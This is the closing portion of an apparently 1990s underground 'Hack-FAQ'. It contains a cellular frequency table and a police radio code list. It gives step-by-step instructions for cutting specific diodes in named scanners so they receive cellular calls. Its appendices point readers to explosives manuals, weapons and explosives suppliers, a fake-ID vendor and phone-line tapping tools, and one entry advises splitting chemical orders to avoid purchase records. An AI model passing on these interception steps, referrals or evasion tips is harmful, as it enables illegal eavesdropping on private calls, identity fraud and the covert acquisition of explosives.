3 376 377 378 379 380 381 382
881.280 881.310 881.340 881.370 881.400 881.430 881.460
836.280 836.310 836.340 836.370 836.400 836.430 836.460
4 397 398 399 400 401 402 403
881.910 881.940 881.970 882.000 882.030 882.060 882.090
836.910 836.940 836.970 837.000 837.030 837.060 837.090
5 418 419 420 421 422 423 424
882.540 882.570 882.600 882.630 882.660 882.690 882.720
837.540 837.570 837.600 837.630 837.660 837.690 837.720
6 439 440 441 442 443 444 445
883.170 883.200 883.230 883.260 883.290 883.320 883.350
838.170 838.200 838.230 838.260 838.290 838.320 838.350
7 460 461 462 463 464 465 466
883.800 883.830 883.860 883.890 883.920 883.950 883.980
838.800 838.830 838.860 838.890 838.920 838.950 838.980
8 481 482 483 484 485 486 487
884.430 884.460 884.490 884.520 884.550 884.580 884.610
839.430 839.460 839.490 839.520 839.550 839.580 839.610
9 502 503 504 505 506 507 508
885.060 885.090 885.120 885.150 885.180 885.210 885.240
840.060 840.090 840.120 840.150 840.180 840.210 840.240
10 523 524 525 526 527 528 529
885.690 885.720 885.750 885.780 885.810 885.840 885.870
840.690 840.720 840.750 840.780 840.810 840.840 840.870
11 544 545 546 547 548 549 550
886.320 886.350 886.380 886.410 886.440 886.470 886.500
841.320 841.350 841.380 841.410 841.440 841.470 841.500
12 565 566 567 568 569 570 571
886.950 886.980 887.010 887.040 887.070 887.100 887.130
841.950 841.980 842.010 842.040 842.070 842.100 842.130
13 586 587 588 589 590 591 592
887.580 887.610 887.640 887.670 887.700 887.730 887.760
842.580 842.610 842.640 842.670 842.700 842.730 842.760
14 607 608 609 610 611 612 613
888.210 888.240 888.270 888.300 888.330 888.360 888.390
843.210 843.240 843.270 843.300 843.330 843.360 843.390
15 628 629 630 631 632 633 634
888.840 888.870 888.900 888.930 888.960 888.990 889.020
843.840 843.870 843.900 843.930 843.960 843.990 844.020
16 649 650 651 652 653 654 655
889.470 889.500 889.530 889.560 889.590 889.620 889.650
844.470 844.500 844.530 844.560 844.590 844.620 844.650
Cell #
Chan 8 9 10 11 12 13 14
1 341 342 343 344 345 346 347
880.230 880.260 880.290 880.320 880.350 880.380 880.410
835.230 835.260 835.290 835.320 835.350 835.380 835.410
2 362 363 364 365 366 367 368
880.860 880.890 880.920 880.950 880.980 881.010 881.040
835.860 835.890 835.920 835.950 835.980 836.010 836.040
3 383 384 385 386 387 388 389
881.490 881.520 881.550 881.580 881.610 881.640 881.670
836.490 836.520 836.550 836.580 836.610 836.640 836.670
4 404 405 406 407 408 409 410
882.120 882.150 882.180 882.210 882.240 882.270 882.300
837.120 837.150 837.180 837.210 837.240 837.270 837.300
5 425 426 427 428 429 430 431
882.750 882.780 882.810 882.840 882.870 882.900 882.930
837.750 837.780 837.810 837.840 837.870 837.900 837.930
6 446 447 448 449 450 451 452
883.380 883.410 883.440 883.470 883.500 883.530 883.560
838.380 838.410 838.440 838.470 838.500 838.530 838.560
7 467 468 469 470 471 472 473
884.010 884.040 884.070 884.100 884.130 884.160 884.190
839.010 839.040 839.070 839.100 839.130 839.160 839.190
8 488 489 490 491 492 493 494
884.640 884.670 884.700 884.730 884.760 884.790 884.820
839.640 839.670 839.700 839.730 839.760 839.790 839.820
9 509 510 511 512 513 514 515
885.270 885.300 885.330 885.360 885.390 885.420 885.450
840.270 840.300 840.330 840.360 840.390 840.420 840.450
10 530 531 532 533 534 535 536
885.900 885.930 885.960 885.990 886.020 886.050 886.080
840.900 840.930 840.960 840.990 841.020 841.050 841.080
11 551 552 553 554 555 556 557
886.530 886.560 886.590 886.620 886.650 886.680 886.710
841.530 841.560 841.590 841.620 841.650 841.680 841.710
12 572 573 574 575 576 577 578
887.160 887.190 887.220 887.250 887.280 887.310 887.340
842.160 842.190 842.220 842.250 842.280 842.310 842.340
13 593 594 595 596 597 598 599
887.790 887.820 887.850 887.880 887.910 887.940 887.970
842.790 842.820 842.850 842.880 842.910 842.940 842.970
14 614 615 616 617 618 619 620
888.420 888.450 888.480 888.510 888.540 888.570 888.600
843.420 843.450 843.480 843.510 843.540 843.570 843.600
15 635 636 637 638 639 640 641
889.050 889.080 889.110 889.140 889.170 889.200 889.230
844.050 844.080 844.110 844.140 844.170 844.200 844.230
16 656 657 658 659 660 661 662
889.680 889.710 889.740 889.770 889.800 889.830 889.860
844.680 844.710 844.740 844.770 844.800 844.830 844.860
Cell #
Chan 15 16 17 18 19 20 21
1 348 349 350 351 352 353 354
880.440 880.470 880.500 880.530 880.560 880.590 880.620
835.440 835.470 835.500 835.530 835.560 835.590 835.620
2 369 370 371 372 373 374 375
881.070 881.100 881.130 881.160 881.190 881.220 881.250
836.070 836.100 836.130 836.160 836.190 836.220 836.250
3 390 391 392 393 394 395 396
881.700 881.730 881.760 881.790 881.820 881.850 881.880
836.700 836.730 836.760 836.790 836.820 836.850 836.880
4 411 412 413 414 415 416 417
882.330 882.360 882.390 882.420 882.450 882.480 882.510
837.330 837.360 837.390 837.420 837.450 837.480 837.510
5 432 433 434 435 436 437 438
882.960 882.990 883.020 883.050 883.080 883.110 883.140
837.960 837.990 838.020 838.050 838.080 838.110 838.140
6 453 454 455 456 457 458 459
883.590 883.620 883.650 883.680 883.710 883.740 883.770
838.590 838.620 838.650 838.680 838.710 838.740 838.770
7 474 475 476 477 478 479 480
884.220 884.250 884.280 884.310 884.340 884.370 884.400
839.220 839.250 839.280 839.310 839.340 839.370 839.400
8 495 496 497 498 499 500 501
884.850 884.880 884.910 884.940 884.970 885.000 885.030
839.850 839.880 839.910 839.940 839.970 840.000 840.030
9 516 517 518 519 520 521 522
885.480 885.510 885.540 885.570 885.600 885.630 885.660
840.480 840.510 840.540 840.570 840.600 840.630 840.660
10 537 538 539 540 541 542 543
886.110 886.140 886.170 886.200 886.230 886.260 886.290
841.110 841.140 841.170 841.200 841.230 841.260 841.290
11 558 559 560 561 562 563 564
886.740 886.770 886.800 886.830 886.860 886.890 886.920
841.740 841.770 841.800 841.830 841.860 841.890 841.920
12 579 580 581 582 583 584 585
887.370 887.400 887.430 887.460 887.490 887.520 887.550
842.370 842.400 842.430 842.460 842.490 842.520 842.550
13 600 601 602 603 604 605 606
888.000 888.030 888.060 888.090 888.120 888.150 888.180
843.000 843.030 843.060 843.090 843.120 843.150 843.180
14 621 622 623 624 625 626 627
888.630 888.660 888.690 888.720 888.750 888.780 888.810
843.630 843.660 843.690 843.720 843.750 843.780 843.810
15 642 643 644 645 646 647 648
889.260 889.290 889.320 889.350 889.380 889.410 889.440
844.260 844.290 844.320 844.350 844.380 844.410 844.440
16 663 664 665 666
889.890 889.920 889.950 889.980
844.890 844.920 844.950 844.980
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?
1. Buy an older scanner before they stopped them from receiving the
necessary freqs (look at garage sales)
2. For a Realistic PRO-2004 open the case and cut one leg of D-513.
3. For a Realistic PRO-2005 open the case and cut one leg of D-502.
4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
and 869-896 MHz.
5. Get the "Scanner Modification Handbook" volumes I and II by Bill
Cheek from Comunications Electronics Inc. (313)996-8888.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?
There are books available at Radio Shack for about $8 that list all
of the freqs used by area.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?
10-00 Series Code
10-0 Exercise great caution.
10-1 Reception is poor.
10-2 Reception is good.
10-3 Stop transmitting.
10-4 Message received.
10-5 Relay message.
10-6 Change channel.
10-7 Out of service/unavailable for assignment.
10-7A Out of service at home.
10-7B Out of service - personal.
10-7OD Out of service - off duty
10-8 In service/available for assignment.
10-9 Repeat last transmission.
10-10 Off duty.
10-10A Off duty at home.
10-11 Identify this frequency.
10-12 Visitors are present (be discrete).
10-13 Advise weather and road conditions.
10-14 Citizen holding suspect.
10-15 Prisoner in custody.
10-16 Pick up prisoner.
10-17 Request for gasoline.
10-18 Equipment exchange.
10-19 Return/returning to the station.
10-20 Location?
10-21 Telephone:______
10-21A Advise home that I will return at ______.
10-21B Phone your home
10-21R Phone radio dispatch
10-22 Disregard the last assignment.
10-22C Leave area if all secure; responsible person/owner is
enroute.
10-23 Standby.
10-24 Request car-to-car transmission.
10-25 Do you have contact with _______?
10-26 Clear.
10-27 Driver's license check.
10-28 Vehicle registration request.
10-29 Check wants/warrants.[vehicle] (PIN,SVS)
10-29a Check wants/warrants [subject] (PIN)
10-29c Check complete [subject]
10-29f The subject is wanted for a felony.
10-29h Caution - severe hazard potential.
10-29r Check wants/record [subject (PIN,CJIC)
10-29m The subject is wanted for a misdemeanor.
10-29v The vehicle is wanted in connection with a possible crime.
10-30 Does not conform to regulations.
10-32 Drowning.
10-33 Alarm sounding.
10-34 Assist at office.
10-35 Time check.
10-36 Confidential information.
10-37 Identify the operator.
10-39 Can ______ come to the radio?
10-40 Is ______ available for a telephone call?
10-42 Check on the welfare of/at ______.
10-43 Call a doctor.
10-45 What is the condition of the patient?
10-45A Condition of patient is good.
10-45B Condition of patient is serious.
10-45C Condition of patient is critical.
10-45D Patient is deceased.
10-46 Sick person [amb. enroute]
10-48 Ambulance transfer call
10-49 Proceed to/Enroute to ______.
10-50 Subject is under the influence of narcotics./Take a report.
10-51 Subject is drunk.
10-52 Resuscitator is needed.
10-53 Person down.
10-54 Possible dead body.
10-55 This is a coroner's case.
10-56 Suicide.
10-56A Suicide attempt.
10-57 Firearm discharged.
10-58 Garbage complaint
10-59 Security check./Malicious mischief
10-60 Lock out.
10-61 Miscellaneous public service.
10-62 Meet a citizen.
10-62A Take a report from a citizen.
10-62B Civil standby.
10-63 Prepare to copy.
10-64 Found property.
10-65 Missing person
10-66 Suspicious person.
10-67 Person calling for help.
10-68 Call for police made via telephone.
10-70 Prowler.
10-71 Shooting.
10-72 Knifing.
10-73 How do you receive?
10-79 Bomb threat.
10-80 Explosion.
10-86 Any traffic?
10-87 Meet the officer at ______.
10-88 Fill with the officer/Assume your post.
10-91 Animal.
10-91a Stray.
10-91b Noisy animal.
10-91c Injured animal.
10-91d Dead animal.
10-91e Animal bite.
10-91g Animal pickup.
10-91h Stray horse
10-91j Pickup/collect ______.
10-91L Leash law violation.
10-91V Vicious animal.
10-95 Out of vehicle-pedestrian/ Requesting an I.D./Tech unit.
10-96 Out of vehicle-ped. send backup
10-97 Arrived at the scene.
10-98 Available for assignment.
10-99 Open police garage door
10-100 Civil disturbance - Mutual aid standby.
10-101 Civil disturbance - Mutual aid request.
11-00 Series Code
11-10 Take a report.
11-24 Abandoned automobile.
11-25 Traffic hazard.
11-26 Abandoned bicycle.
11-27 10-27 with the driver being held.
11-28 10-28 with the driver being held.
11-40 Advise if an ambulance is needed.
11-41 An ambulance is needed.
11-42 No ambulance is needed.
11-48 Furnish transportation.
11-51 Escort.
11-52 Funeral detail.
11-54 Suspicious vehicle.
11-55 Officer is being followed by automobile.
11-56 Officer is being followed by auto containing dangerous
persons.
11-57 An unidentified auto appeared at the scene of the assignment.
11-58 Radio traffic is being monitored. Phone all non-routine
messages.
11-59 Give intensive attention to high hazard/business areas.
11-60 Attack in a high hazard area.
11-65 Signal light is out.
11-66 Defective traffic light.
11-78 Aircraft accident.
11-79 Accident - ambulance has been sent.
11-80 Accident - major injuries.
11-81 Accident - minor injuries.
11-82 Accident - no injuries.
11-83 Accident - no details.
11-84 Direct traffic.
11-85 Tow truck required.
11-94 Pedestrian stop.
11-95 Routine traffic stop.
11-96 Checking a suspicious vehicle.
11-97 Time/security check on patrol vehicles.
11-98 Meet: _______
11-99 Officer needs help.
900 Series Codes
904 Fire.
904A Automobile fire.
904B Building fire.
904G Grass fire.
909 Traffic problem; police needed.
910 Can handle this detail.
932 Turn on _______ mobile relay at _______.
933 Turn off mobile relay.
949 Burning inspection at _______.
950 Control burn in progress/about to begin/ended.
951 Need fire investigator.
952 Report on conditions.
953 Investigate smoke.
953A Investigate gas.
954 Off the air at the scene of the fire.
955 Fire is under control.
956 Assignment not finished.
957 Delayed response of __ minutes.
980 Restrict calls to emergency only.
981 Resume normal traffic.
1000 Plane crash
3000 Road block
Other Codes
Code 1 Do so at your convenience.
Code 2 Urgent.
Code 3 Emergency/lights and siren.
Code 4 No further assistance is needed.
Code 5 Stakeout.
Code 6 Responding from a long distance.
Code 7 Mealtime.
Code 8 Request cover/backup.
Code 9 Set up a roadblock.
Code 10 Bomb threat
Code 12 Notify news media
Code 20 Officer needs assistance
Code 22 Restricted radio traffic
Code 30 Officer needs HELP - EMERGENCY!
Code 33 Mobile emergency - clear this radio channel.
Code 43 TAC forces committed.
AID Public Safety Assistance
Phonetic Alphabet
A Adam N Nora
B Boy O Ocean
C Charles P Paul
D David Q Queen
E Edward R Robert
F Frank S Sam
G George T Tom
H Henry U Union
I Ida V Victor
J John W William
K King X X-ray
L Lincoln Y Yellow
M Mary Z Zebra
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?
Vehicles
Item Example
1. Color Red over black
2. Year 1984
3. Make Cadillac
4. Body Two door
5. License plate 6VWH926 (given phonetically!)
Persons
1. Name
2. Race
3. Sex
4. Age
5. Height
6. Weight
7. Hair color
8. Eye color
9. Complexion
10. Physical marks, tattoos, scars, limps, etc.
11. Clothing (head to feet)
a. Hat
b. Shirt;tie
c. Coat
d. Trousers
e. Socks
f. Shoes
=====================================================================
Appendix A. FTP sites with useful info:
ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.
=====================================================================
Apendix B. Interesting gophers:
gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu
=====================================================================
Appendix C. Informative USENET Newsgroups
alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip
Also try IRC #hack. *** WARNING: May be lame at times!!! ***
=====================================================================
Appendix D. Publications and Zines
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600:The Hacker Quarterly
a technical journal put out by hackers
mail: email:
2600 2600@well.sf.ca.us
PO Box 752 emmanuel@well.sf.ca.us
Middle Island, NY 11953
PH:516-751-2600
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK
The electronic journal of hackers and phreakers.
Email: phrack@well.sf.ca.us
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED
The magazine of the cyberculture.
Email: subscription@wired.com
info@wired.com
Or look for it on many newsstands.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fringe Ware Review
Email: fringeware@io.com
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Iron Feather Journal
Mail:
IFJ
PO Box 1905
Boulder CO 80306
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Groom Lake Desert Rat
Email: psychospy@aol.com
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Cybertek: The Cyberpunk Technical Journal
Mail:
Cybertek
PO Box 64
Brewster NY 10509
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
LineNoiz
Email: dodger@fubar.bk.psu.edu
with
'subscription linenoiz '
in the body of the message
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
For more info on Zines then check out Factsheet Five and
Factsheet Five Electronic.
email: jerod23@well.sf.ca.us
=====================================================================
Appendix E. Books
APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.
Davis, Tenney L.: "Chemistry of Powder and Explosives."
Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)
Russell: "Computer Security Basics"
Cornwall: "The (New) Hacker's Handbook"
"Cyberpunk" (forget the authors)
Kochan & Wood: "UNIX System Security"
Spafford & Garfinkel: " Practical UNIX Security"
Stohl, Clifford: "The Cuckoo's Egg"
Gasser, Morrie: "Building a Secure Computer System
THE RAINBOW SERIES
Can be obtained free from:
INFOSEC Awareness Office
National Computer Security Centre
9800 Savage Road
Fort George G. Meade, MD 20755-6000
Tel: 1-301-766-8729
"The Improvised Munitions Manual"
=====================================================================
Appendix F. Files and Papers.
Morris & Thompson: "Password Security, A Case History"
Curry: "Improving the Security of your UNIX System"
available via FTP as 'security-doc.tar.Z'
Klein: "Foiling the Cracker: A Survey of, and Improvements to,
Password Security."
Archie search for 'Foiling'
Cheswick: "The Design of a Secure Internet Gateway"
available from research.att.com
/dist/Secure_Internet_Gateway.ps
Cheswick: "An Evening with Berford: in which a Cracker is Lured,
Endured and Studied"
available from research.att.com
/dist/berford.ps
Bellovin89: "Security Problems in the TCP/IP Protocol Suite"
available from research.att.com
/dist/ipext.ps.Z
Bellovin91: "Limitations of the Kerberos Authentication System"
available from research.att.com
CERT: many various bits of info collected at cert.sei.cmu.edu
"Open Systems Security"
available from ajk.tele.fi(131.177.5.20)
/PublicDocuments
RFC-1244: "The Site Security Handbook"
"The Terrorist's Handbook"
how to make various explosive, propellants and
ignitors and also how to apply and use them
=====================================================================
Appendix G. Catalogs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Lockpicks
(from Belisarius)
You can get lockpicks from:
American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062
Lock Pick Sets
==============
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.
Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.
Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Explosives and other underground stuff
Loompanics is one of the major distributors of material relating to
the underground including explosives. You can get the catalog by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)
NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367
NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Weapons, explosives, survival gear.
(from CyberSorceror)
Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305
Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Paladin Press
PO Box 1307
Boulder, CO 80306
Enclose $2 for the publishers of the "Action Library".
Books on lockpicking, wiretapping, etc.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)
Their Customer Service Number is as follows:
1-800-333-5102
Their Hours are:
9am-9pm, Monday-Friday
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
For beige boxing, data com cracking/patching tools try:
TIME MOTION TOOLS
12778 BROOKPRINTER PLACE
POWAY, CA 92064-6810
(619) 679-0303
(800) 779-8170
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)
Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220
Send a crisp $1 bill and a request for a catalog. Tip: Don't order
all your pyro stuff from here. They DO keep records. Be safe.
=====================================================================
Appendix H. PGP keys
None available currently ...
=====================================================================
*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy's plans and you will know ******
***** which strategy will be successful and which will not. ******
***** -- Sun Tzu, The Art of War ******
*********************************************************************
*********************************************************************